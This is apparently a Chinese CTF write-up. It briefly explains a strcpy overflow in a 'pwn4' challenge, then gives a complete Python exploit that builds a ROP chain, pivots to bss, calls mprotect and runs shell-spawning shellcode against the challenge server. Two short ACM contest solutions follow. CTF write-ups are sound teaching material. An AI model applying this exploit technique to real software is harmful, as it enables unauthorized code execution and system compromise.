刚开始ida反编译出来的时候,感觉程序就是依托答辩。慢慢用figner和bindiff的识别下,稍微修改了程序以后,能够看出来程序的逻辑。

image-20230712145344952

可以看到中间有个strcpy函数,可以实现溢出。另外,read函数中可以通过截断进行字符数的绕过。

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from pwncy import *

context(arch = 'amd64',log_level = "debug")

p = load("pwn4", ip_port = "node5.anna.nssctf.cn:28478")
debug(p,'no-tmux',0x448c80)

def write(index, content):
    ru('password:')
    payload = b'a' * 0x108
    payload += b'c' * (0x8 * (index))
    payload += content
    payload = payload.ljust(0x150, b'\x00')
    s(payload)


def write2(payload):
    ru('password:')
    s(payload)


def recover(length):
    for i in range(8):
        payload = b'a' * (length - i) + b'\x00'
        payload = payload.ljust(0x150, b'\x00')
        write2(payload)


def attack(index, payload):
    write(index, payload)
    recover(0x108 + index * 8 - 1)

read = 0x448c80
bss = 0x6b6010

pop_rdi = 0x400706
pop_rsi = 0x410043
pop_rsi_r15 = 0x400704
pop_rdx = 0x44b226
pop_rax = 0x4005af
syscall = 0x474c15
pop_rsp = 0x401de3

payload = [
    p64(pop_rdi), p64(0), p64(pop_rsi_r15), p64(bss), p64(0), 
    p64(read), p64(pop_rsp), p64(bss), p64(0)
]

for i in range(len(payload)):
    attack(len(payload) - i - 1, payload[len(payload) - i - 1])

payload = 'PASSWORD'.ljust(0x150, '\x00')
write2(payload)

ru('GoodTime.',drop = True)

shellcode = asm(shellcraft.sh())
payload = flat(
    {
        0: [
            pop_rdi, bss - 0x10, pop_rsi, 0x1000, pop_rdx, 0x7, 
            pop_rax, 10, syscall,
            bss + 0x100
        ], 
        0x100: shellcode
    }
)
s(payload)
itr()

image-20230712145405212

ACM

Prime

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import math

# 第一步,先计算出前100个质数
MAXN = 600
primes = [True for _ in range(MAXN)]
primes[0] = primes[1] = False
for i in range(2, int(math.sqrt(MAXN)) + 1):
    if primes[i]:
        for j in range(i * i, MAXN, i):
            primes[j] = False

primes = [i for i in range(MAXN) if primes[i]]

# 定义 Legendre's formula 函数
def Legendre(n, p):
    res = 0
    while n:
        n //= p
        res += n
    return res

# 定义求解函数
def solve(e, p):
    l = 1
    r = int(1e18)
    while l < r:
        mid = (l + r) // 2
        if Legendre(mid, p) >= e:
            r = mid
        else:
            l = mid + 1
    return r

# 输入数据
m = int(input().strip())
e = list(map(int, input().strip().split()))

# 计算结果
res = 1
for i in range(m):
    res = max(res, solve(e[i], primes[i]))

print(res)

Small

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
#define max(a, b) ((a) > (b) ? (a) : (b))
#define min(a, b) ((a) < (b) ? (a) : (b))
typedef long long ll;
ll arr[100000];
int main() {
	int n;
	scanf("%d", &n);
	ll ans = 0;
	ll mi = 2e31, mx = -2e31;
	for (int i = 1; i <= n; i++) {
		scanf("%lld", &arr[i]);
		mi = min(mi, arr[i]);
		mx = max(mx, arr[i]);
		ans = (mx - mi) * 2;
		printf("%lld\n", ans);
}
return 0;
}